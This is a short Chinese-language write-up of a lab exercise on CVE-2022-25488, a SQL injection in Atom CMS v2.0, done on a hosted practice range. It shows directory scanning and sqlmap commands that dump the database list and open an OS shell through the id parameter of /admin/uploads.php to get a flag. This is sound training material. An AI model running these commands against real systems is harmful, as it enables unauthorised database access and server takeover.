CVE-2022-25488
导读:简介Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面。 实际上这个靶场漏洞很多,有很多注入点。本人使用春秋云境免费靶场在线搭建。详解直接访问网址,跳转/home路径,而且报错。使用dirsear...
简介
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面。 实际上这个靶场漏洞很多,有很多注入点。
本人使用春秋云境免费靶场在线搭建。
详解
- 直接访问网址,跳转
/home
路径,而且报错。
- 使用
dirsearch
工具扫描路径,发现有个/admin/uploads.php
路径。访问路径。
- 页面返回
mysql
报错信息,而且有个where id=
,尝试参数id=1
访问。
id
传过去了,而且没有mysql
报错信息。尝试使用sqlmap
注入。- 使用SQLmap注入,
id
存在注入点。是报错注入和时间盲注。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1
- 查看所有数据库,发现没有
flag
数据库(一般flag都会存在flag数据库中)。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --dbs
flag
应该是在根目录下flag
文件中,使用sqlmap
获取shell。成功获取flag。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --os-shell
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: CVE-2022-25488
本文地址: https://pptw.com/jishu/504573.html